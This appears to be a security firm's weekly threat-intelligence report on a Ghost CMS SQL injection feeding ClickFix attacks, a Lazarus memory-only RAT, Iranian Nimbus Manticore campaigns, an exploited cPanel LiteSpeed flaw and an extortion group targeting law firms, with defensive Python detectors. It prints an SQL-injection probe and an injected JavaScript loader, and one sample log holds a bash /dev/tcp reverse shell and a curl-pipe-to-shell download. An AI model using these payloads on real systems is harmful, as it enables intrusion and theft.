June 4 / 2026 / Reading Time: 7 minutes

Weekly Situation Report : 6/1/26

EXECUTIVE SUMMARY

This article informs our partners and clients of notable developments in the cybersecurity space: relevant breaches, emerging vulnerabilities, research, threat actor movement, and what your organization needs to do to mitigate future threats.

KEY TAKEAWAYS

  • A SQL injection vulnerability in Ghost CMS is being leveraged to power large-scale ClickFix malware campaigns.
  • A subgroup of the Lazarus APT has introduced a new fileless remote access trojan designed to evade traditional detection methods.
  • Nimbus Manticore is continuing its targeted campaigns against aerospace and technology organizations.
  • A vulnerability in the cPanel LiteSpeed plugin (CVE-2026-48172) is being actively exploited in the wild.
  • The Silent Ransom Group (SRG), a cyber extortion operation, is specifically targeting law firms in focused intrusion campaigns.

1. Ghost CMS SQL Injection Flaw Fuels Large Scale ClickFix Campaigns

SUMMARY

A large-scale campaign is exploiting a critical SQL injection vulnerability in Ghost CMS to inject malicious JavaScript, leading to ClickFix attacks on over 700 domains. Despite an available patch, affected sites include prestigious universities and tech companies.

Category

Known Exploited Vulnerabilities

Industry

Technology, Public Sector and Government Administration, Education

Sources

https://www.sentinelone.com/vulnerability-database/cve-2026-26980/

https://blog.xlab.qianxin.com/ghost-cms-mass-compromised-via-cve-2026-26980-now-fueling-clickfix-attacks/

https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/

Internal OSec Research

ANALYST COMMENTS

A large-scale campaign is exploiting CVE-2026-26980, a SQL injection vulnerability in Ghost CMS, to inject malicious JavaScript and deliver ClickFix attacks across more than 700 websites, including DuckDuckGo and Harvard. The flaw affects Ghost versions 3.24.0 through 6.19.0 and lets attackers read admin API keys and modify content. Although a patch has been available since February 19, many sites remain unpatched or have been reinfected. Multiple public proof-of-concept exploits are available, and the highest concentration of exposed hosts was observed in the United States.

# Request when actively checking for vulnerability, note the SQL string in the filter parameter:
GET /ghost/api/content/tags/?key=<redacted>&filter=slug:%5B'%20OR%20(1=1)%20THEN%20(SELECT%20abs(-9223372036854775808))%20WHEN%20slug=',news%5D&limit=all HTTP/1.1
Host: localhost:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

ACTIONABLE GUIDANCE

Ghost CMS instances on affected versions (3.24.0 through 6.19.0) should be updated to a patched release. Monitoring should focus on SQL injection artifacts in GET requests to /ghost/api/content/tags/?key=...&filter=slug:<SQL string, URL encoded>. Analysis of compromised sites associated with this campaign found the following malicious JavaScript injected into the Ghost CMS instances:

# Injected malicious code:

<script>
(function(){
  var a = location;
  var b = document.head || document.getElementsByTagName("head")[0];
  var c = "script";
  var d = atob("<base64 string>");

  d += d.indexOf("?") > -1 ? "&" : "?";
  d += a.search.substring(1);

  c = document.createElement(c);
  c.src = d;
  c.id = btoa(a.origin);
  b.appendChild(c);
})();
</script>
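The following Python, added here as a worked example (it is not code from the original report, from Ghost, or from the cited researchers), applies both parts of the guidance above: it parses combined-format access log lines, URL-decodes the filter parameter of Content API requests and flags SQL syntax where only NQL belongs, and it extracts the base64-encoded loader URL from inline scripts shaped like the injected snippet. The log lines, the sample page and the loader.example URL are constructed for illustration; tune the keyword heuristic against your own traffic before alerting on it.

```python
"""Two checks for the Ghost CMS campaign described above.

Added example (not code from the original report, Ghost, or the cited
researchers): scan_log() flags Content API requests whose `filter` parameter
carries SQL rather than NQL, and find_clickfix_loaders() pulls the loader URL
out of inline scripts shaped like the injected snippet.  Log lines, HTML and
the loader URL below are constructed for illustration.
"""
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access log lines (combined log format): the first mirrors the
# probe shown in this report, the other two are ordinary Content API calls.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jun/2026:10:00:01 +0000] "GET /ghost/api/content/tags/?key=abc&filter=slug:%5B'%20OR%20(1=1)%20THEN%20(SELECT%20abs(-9223372036854775808))%20WHEN%20slug=',news%5D&limit=all HTTP/1.1" 500 128 "-" "python-requests/2.31.0"
198.51.100.9 - - [01/Jun/2026:10:00:02 +0000] "GET /ghost/api/content/tags/?key=abc&filter=slug:news&limit=all HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Jun/2026:10:00:03 +0000] "GET /ghost/api/content/posts/?key=abc&filter=tag:news+title:'Case+Study' HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# NQL never needs SQL keywords followed by a parenthesised expression, a bare
# n=n tautology, or abs()/sleep()-style calls.  abs() of the minimum signed
# 64-bit integer is a classic error-based probe: it overflows in the database,
# so an error reply vs. a normal one leaks whether the injected branch ran.
SQLI_RE = re.compile(
    r"\b(select|union)\b|\bcase\s+when\b|\b(or|and|when|then)\s*\(|"
    r"\(\s*\d+\s*=\s*\d+\s*\)|\b(abs|sleep|benchmark)\s*\(",
    re.IGNORECASE,
)


def decode_filter(target: str) -> Optional[str]:
    """Return the decoded `filter` value for Content API requests, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/ghost/api/content/"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("filter")
    if not values:
        return None
    # parse_qs already decoded once; decode again to catch double encoding.
    return unquote(values[0])


def looks_like_sqli(filter_value: str) -> bool:
    """Heuristic: SQL syntax, or an unbalanced quote, inside an NQL filter."""
    return bool(SQLI_RE.search(filter_value)) or filter_value.count("'") % 2 == 1


def scan_log(text: str) -> list:
    """Return one record per request whose filter parameter looks injected."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        flt = decode_filter(m["target"])
        if flt is not None and looks_like_sqli(flt):
            hits.append({"ip": m["ip"], "ua": m["ua"], "status": m["status"], "filter": flt})
    return hits


INLINE_SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
ATOB_RE = re.compile(r'''atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)''')


def find_clickfix_loaders(html: str) -> list:
    """Decode the base64 loader URL from inline scripts matching the injected
    pattern: atob() source, btoa(origin) as the element id, appended to <head>."""
    urls = []
    for script in INLINE_SCRIPT_RE.findall(html):
        if "btoa(" not in script or ".origin" not in script or "appendChild" not in script:
            continue
        for b64 in ATOB_RE.findall(script):
            try:
                urls.append(base64.b64decode(b64, validate=True).decode("utf-8"))
            except (ValueError, UnicodeDecodeError):
                continue
    return urls


# Constructed page carrying the injected snippet with a placeholder loader URL
# (loader.example is an assumption for the demo, not a campaign indicator).
LOADER_B64 = base64.b64encode(b"https://loader.example/s.js").decode()
SAMPLE_HTML = (
    '<html><head><title>t</title><script>(function(){var a=location;'
    'var b=document.head;var c="script";var d=atob("' + LOADER_B64 + '");'
    'd+=d.indexOf("?")>-1?"&":"?";d+=a.search.substring(1);'
    'c=document.createElement(c);c.src=d;c.id=btoa(a.origin);b.appendChild(c);})();'
    '</script></head><body></body></html>'
)

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("SQLi probe:", hit)
    print("loader URLs:", find_clickfix_loaders(SAMPLE_HTML))
```

Feed scan_log() your Ghost front-end or reverse proxy access log and find_clickfix_loaders() the rendered HTML of each page; a loader URL that is not yours is a compromised instance, and a hit on scan_log() from before the patch date tells you whether a "patched" site needs to be treated as already breached.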

2. Lazarus APT Subgroup Unveils Fileless RAT Designed to Evade Detection

SUMMARY

The North Korea-linked Lazarus APT group has developed a sophisticated memory-only RAT called RemotePE, which operates entirely in memory and uses environmental keying to evade detection, allowing for long-term observation and potential high-impact operations.

Category

State-Sponsored Espionage

Industry

Finance, Business Services

Sources

https://blog.fox-it.com/2026/05/22/remotepe-the-lazarus-rat-that-lives-in-memory/

https://securityaffairs.com/192666/apt/lazarus-apt-unveils-fileless-remote-access-trojan-designed-to-evade-detection.html

https://www.chainalysis.com/blog/lessons-from-the-drift-hack/

Internal OSec Research

ANALYST COMMENTS

The North Korea-linked Lazarus subgroup Citrine Sleet has developed a memory-resident Remote Access Trojan known as RemotePE. The malware uses a three-stage infection chain consisting of DPAPILoader, RemotePELoader, and RemotePE, leveraging DPAPI encryption, environmental keying, and anti-analysis techniques to create victim-specific payloads and evade detection.

While available samples date back to 2023 and 2024, several command and control indicators remain active, reflecting Lazarus' long-standing practice of reusing infrastructure and tooling. The campaign primarily targets financial and cryptocurrency organizations through highly targeted social engineering operations.

ACTIONABLE GUIDANCE

The actor is known for prolonged social engineering campaigns targeting personnel within financial and cryptocurrency organizations. In observed attacks, victims are lured into meetings where the threat actor simulates an audio or technical issue and convinces them to install a malicious file. Organizations can reduce risk by restricting software installation privileges to authorized personnel.

Detection efforts should focus on POST requests to /channel endpoints, particularly those using the Microsoft-Delivery-Optimization/10 user agent when communicating with non-Microsoft infrastructure.
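As an added example (not code from the original report or from the cited researchers), the Python below triages JSON-lines proxy records for the pattern in the guidance above: POST requests to a path ending in /channel, bound for a non-Microsoft host, scored higher when the Microsoft-Delivery-Optimization/10 user agent is present. The field names, the sample records and the Microsoft domain allowlist are assumptions to adapt to your proxy and baseline; the legitimate Delivery Optimization client does use this user agent, so the destination allowlist, not the user agent alone, is what separates signal from noise.

```python
"""Proxy-log triage for the RemotePE C2 pattern described above.

Added example, not code from the original report or the cited researchers.
Assumes JSON-lines proxy records with `src`, `method`, `host`, `path` and
`ua` fields (rename to match your proxy).  The records and the Microsoft
suffix allowlist are illustrative and must be tuned to your own baseline.
"""
import json
from ipaddress import ip_address
from typing import Optional

# Assumed allowlist: domains the Delivery Optimization client is expected to
# talk to.  Anything else carrying its user agent is the anomaly the guidance
# points at.  Build the real list from your own proxy baseline.
MICROSOFT_SUFFIXES = (".microsoft.com", ".windowsupdate.com", ".windows.com")
DO_USER_AGENT = "Microsoft-Delivery-Optimization/10"


def is_microsoft_host(host: str) -> bool:
    """True only for names under the allowlisted suffixes; bare IPs never qualify."""
    host = host.lower().rstrip(".")
    try:
        ip_address(host)
        return False  # a literal IP is not how the real client reaches Microsoft
    except ValueError:
        pass
    return any(host == suffix[1:] or host.endswith(suffix) for suffix in MICROSOFT_SUFFIXES)


def classify(record: dict) -> Optional[str]:
    """Return 'high', 'medium' or None for one proxy record."""
    if record.get("method", "").upper() != "POST":
        return None
    if not record.get("path", "").rstrip("/").endswith("/channel"):
        return None
    if is_microsoft_host(record.get("host", "")):
        return None
    if record.get("ua", "").startswith(DO_USER_AGENT):
        return "high"    # Delivery Optimization UA talking to non-Microsoft infrastructure
    return "medium"      # POST /channel to an unknown host is worth a look on its own


def flag_remotepe_beacons(lines) -> list:
    """Walk JSON-lines records and return the ones worth an analyst's time."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        severity = classify(rec)
        if severity:
            hits.append({"src": rec.get("src"), "host": rec.get("host"),
                         "path": rec.get("path"), "severity": severity})
    return hits


# Constructed proxy records, not real traffic: one true positive, one benign
# Delivery Optimization call, one weaker hit, and one GET that is ignored.
SAMPLE_PROXY_LOG = "\n".join(json.dumps(r) for r in [
    {"src": "10.0.0.21", "method": "POST", "host": "203.0.113.44", "path": "/channel",
     "ua": "Microsoft-Delivery-Optimization/10"},
    {"src": "10.0.0.21", "method": "POST", "host": "tlu.dl.delivery.mp.microsoft.com",
     "path": "/channel", "ua": "Microsoft-Delivery-Optimization/10"},
    {"src": "10.0.0.33", "method": "POST", "host": "cdn-updates.example.net",
     "path": "/api/channel/", "ua": "Mozilla/5.0"},
    {"src": "10.0.0.33", "method": "GET", "host": "cdn-updates.example.net",
     "path": "/channel", "ua": "Microsoft-Delivery-Optimization/10"},
])

if __name__ == "__main__":
    for hit in flag_remotepe_beacons(SAMPLE_PROXY_LOG.splitlines()):
        print(hit)
```

The suffix match deliberately requires a dot boundary, so microsoft.com.attacker.example does not pass, and a literal IP is always treated as non-Microsoft; if your environment fronts Windows Update through an on-premises cache, add its name to the allowlist rather than loosening the check.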

3. Nimbus Manticore Continued Campaign Movements Against Aerospace and Technology Orgs

SUMMARY

During Operation Epic Fury, the Iran-linked cyber threat actor Nimbus Manticore accelerated its cyberattacks by leveraging AI-assisted malware development. The campaign introduced new backdoors like MiniFast, and leveraged novel tactics such as SEO poisoning and trojanized Zoom installers to target organizations across multiple sectors and regions.

Category

Threat Actor Activities

Industry

Aviation / Aerospace, Telecommunications, Public Sector and Government Administration, Technology

Sources

https://research.checkpoint.com/2026/fast-and-furious-nimbus-manticore-operations-during-the-iranian-conflict/

https://unit42.paloaltonetworks.com/tracking-iran-apt-screening-serpens/

https://securityaffairs.com/192689/apt/nimbus-manticore-expanded-attacks-with-ai-assisted-malware-and-fake-zoom-installers.html

https://www.picussecurity.com/threat-database/unc1549-ttps-iranian-apt-targeting-aerospace-and-defense

https://cloud.google.com/blog/topics/threat-intelligence/suspected-iranian-unc1549-targets-israel-middle-east/

Internal OSec Research

ANALYST COMMENTS

During Operation Epic Fury, the Iran-linked threat actor Nimbus Manticore used AI-assisted malware, fake Zoom installers, and SEO poisoning to target defense, aviation, and telecommunications organizations. The campaign introduced two new backdoors, MiniJunk and MiniFast, and relied on SEO poisoning and fake software download sites such as getsqldeveloper[.]com alongside employment-themed phishing lures in the style of the "Dream Job" campaign. Infrastructure associated with the SEO poisoning activity was offline at the time of analysis.

# Code signing certificate subjects used to sign binaries
Gray Matter Software S.R.L.
Kirubel Kerie Negeya

# Domains used for phishing and SEO landing pages
Domains (stale)
business-startup[.]org
business-startup.azurewebsites[.]net
businessstartup.azurewebsites[.]net
buisness-centeral.azurewebsites[.]net
buisness-centeral-transportation.azurewebsites[.]net
buisness-centeral-transportation[.]com
licencemanagers.azurewebsites[.]net
licencesupporting.azurewebsites[.]net    
peerdistsvcmanagers.azurewebsites[.]net
nanomatrix.azurewebsites[.]net
PremierHealthAdvisory[.]com
PremierHealthAdvisory.azurewebsites[.]net
Premier-HealthAdvisory.azurewebsites[.]net
ramiltonsfinance[.]com
ramiltonsfinance.azurewebsites[.]net
ramiltons-finance.azurewebsites[.]net
globalitconsultants.azurewebsites[.]net
globalit-consultants.azurewebsites[.]net
global-it-consultants.azurewebsites[.]net
global-it-checkers.azurewebsites[.]net
global-it-checkbusiness.azurewebsites[.]net
global-check-itbusiness.azurewebsites[.]net
global-check-business-it.azurewebsites[.]net
globalbusiness-checkers-it.azurewebsites[.]net
getsqldeveloper[.]com (currently down)

# Sha256 Hashes

Current visibility suggests the actor may be rotating infrastructure, shifting operational objectives during the current ceasefire period, or preparing for future campaigns. Developments related to the 2026 blockade and ceasefire may also influence future targeting and victim selection. Despite these potential changes, the actor is likely to continue to use tactics like SEO poisoning and signed binaries in future attacks.

ACTIONABLE GUIDANCE

Organizations in the telecommunications, aviation, government, and public administration sectors, and U.S. aviation organizations in particular, face the greatest risk from this actor. Users should verify the source of files before execution, and administrators should block unapproved software and monitor for known campaign infrastructure. Because the actor frequently ships signed binaries, detection keyed on the signing certificate subjects listed above is valuable. Organizations matching the targeting profile should add the known indicators to blocklists and hunt retrospectively for them.

4. cPanel Litespeed Plugin Flaw CVE-2026-48172 Exploited in the Wild

SUMMARY

The U.S. Cybersecurity and Infrastructure Security Agency has mandated U.S. federal agencies to secure their servers against a critical privilege escalation vulnerability in the LiteSpeed cPanel user-end plugin. The flaw allows remote attackers to execute arbitrary scripts with root privileges and is being actively prioritized for remediation.

Category

Known Exploited Vulnerabilities

Industry

Technology, Public Sector and Government Administration

Sources

https://www.bleepingcomputer.com/news/security/cisa-gives-feds-4-days-to-patch-actively-exploited-cpanel-plugin-flaw/

https://nvd.nist.gov/vuln/detail/CVE-2026-48172

ANALYST COMMENTS

CISA has directed federal agencies to remediate CVE-2026-48172, a critical privilege escalation vulnerability in the LiteSpeed cPanel user-end plugin that is being actively exploited. The flaw allows remote attackers with valid credentials to execute arbitrary scripts as root via the /execute/Litespeed/redisAble.php endpoint. LiteSpeed has released updates; organizations should validate exposure and review logs for signs of compromise.

A public proof of concept is available, increasing the likelihood of broader exploitation.

ACTIONABLE GUIDANCE

Organizations should apply the vendor-provided patch as soon as possible. Observed exploitation sends GET requests to /execute/Litespeed/redisAble.php carrying Linux shell commands in the redis_server parameter, which is how the publicly available PoC establishes a reverse shell to an attacker-controlled host. Defenders should expect variations in the command used, so detection should key on any request to the vulnerable endpoint whose redis_server value contains shell syntax or an encoded payload, and on suspicious command execution on the host that follows such a request.
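To make the guidance above concrete, the following Python (an added example, not code from the original report, cPanel or LiteSpeed) scans combined-format access log lines for requests to /execute/Litespeed/redisAble.php, decodes the redis_server parameter (including one base64 layer, to catch encoded payloads) and reports values containing shell metacharacters or reverse-shell building blocks. The log lines, usernames and addresses are constructed, and the "benign shape" of a redis_server value (host[:port] or socket path) is an assumption; the value is taken from the query string, so a POST body would need a WAF or LiteSpeed request log rather than the access log.

```python
"""Access-log triage for CVE-2026-48172 exploitation attempts.

Added example, not code from the original report, cPanel or LiteSpeed.
Assumes combined-format access logs with the redis_server value in the query
string.  Log lines, users and addresses are constructed for illustration.
"""
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, quote, unquote, urlsplit

TARGET_PATH = "/execute/Litespeed/redisAble.php"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Assumed benign shape for a Redis server setting: host[:port] or a socket path.
BENIGN_RE = re.compile(r"^(?:[A-Za-z0-9.\-]+(?::\d{1,5})?|/[\w./\-]+)$")
# Shell metacharacters and the usual reverse-shell building blocks.
SHELL_RE = re.compile(
    r"[;|&`\n]|\$\(|\$\{|>&|/dev/tcp/|\b(sh|bash|nc|ncat|curl|wget|python\d?|perl|php)\b",
    re.IGNORECASE,
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def inspect_value(value: str) -> Optional[str]:
    """Return a reason string if the redis_server value looks like a command."""
    candidates = [value, unquote(value)]  # second decode catches double encoding
    if B64_RE.match(value.strip()):
        try:
            decoded = base64.b64decode(value.strip(), validate=True)
            candidates.append(decoded.decode("utf-8", "replace"))
        except ValueError:
            pass
    for cand in candidates:
        if BENIGN_RE.match(cand):
            continue
        m = SHELL_RE.search(cand)
        if m:
            return f"shell syntax {m.group(0)!r} in {cand!r}"
    return None


def scan_access_log(text: str) -> list:
    """Return one record per request to the vulnerable endpoint with a command-like value."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != TARGET_PATH:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("redis_server", []):
            reason = inspect_value(value)
            if reason:
                hits.append({"ip": m["ip"], "user": m["user"], "status": m["status"], "reason": reason})
    return hits


# Constructed log lines: a legitimate setting, a plain reverse shell, a
# base64-wrapped download-and-run, and an unrelated UAPI call.
REVERSE_SHELL = "127.0.0.1;bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"
ENCODED = base64.b64encode(b"x;curl http://203.0.113.9/s|sh").decode()
SAMPLE_LOG = "\n".join([
    '198.51.100.7 - alice [01/Jun/2026:09:00:00 +0000] "GET /execute/Litespeed/redisAble.php?redis_server=127.0.0.1:6379 HTTP/1.1" 200 95',
    '203.0.113.9 - alice [01/Jun/2026:09:00:05 +0000] "GET /execute/Litespeed/redisAble.php?redis_server='
    + quote(REVERSE_SHELL, safe="") + ' HTTP/1.1" 200 95',
    '203.0.113.9 - alice [01/Jun/2026:09:00:09 +0000] "GET /execute/Litespeed/redisAble.php?redis_server='
    + quote(ENCODED, safe="") + ' HTTP/1.1" 200 95',
    '198.51.100.7 - alice [01/Jun/2026:09:01:00 +0000] "GET /execute/Email/list_pops HTTP/1.1" 200 1024',
])

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Because the flaw requires valid credentials, every hit carries a cPanel username; treat that account as compromised, and check the host for the outbound connection the command attempted, since the request log only proves the attempt, not the result.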

5. Silent Ransomware Targeting Law Firms

SUMMARY

The Silent Ransom Group (SRG), a cyber extortion group formerly associated with the Conti ransomware syndicate, is increasingly targeting U.S. law firms. The group uses phishing, fake IT support calls, and in-person visits to steal sensitive data for extortion purposes.

Category

Ransomware

Industry

Legal and Law, Business Services

Sources

https://therecord.media/fbi-warns-hackers-visit-law-firms-to-steal-data

https://www.ic3.gov/CSA/2026/260526.pdf

Internal OSec Research

ANALYST COMMENTS

The Silent Ransom Group (SRG), also tracked as Luna Moth, Chatty Spider, and UNC3753, is a cyber extortion group linked to the former Conti ransomware syndicate that is actively targeting U.S. law firms. The group relies on phishing, voice phishing, IT impersonation, and legitimate remote management tools to gain access and steal sensitive data. Once inside a network, SRG leverages tools such as WinSCP, Rclone, and credential reuse to expand access and facilitate extortion.

ACTIONABLE GUIDANCE

Users should verify the identity of anyone claiming to be IT support before granting access or following instructions. Organizations should restrict remote management software, reduce credential theft opportunities, and limit access to administrative tools.

Additional defenses include restricting scripting and command line tools, limiting removable media, enforcing multifactor authentication, and disabling unnecessary remote access services. While U.S. law firms face elevated risk from SRG, the threat is comparable to other ransomware and extortion groups targeting the legal sector.

Get the Complete Report

The full Intelligence Desk brief includes exhaustive IOC lists, YARA detection rules, detailed remediation playbooks, and OSec's original threat research. It is delivered weekly to our partners and clients.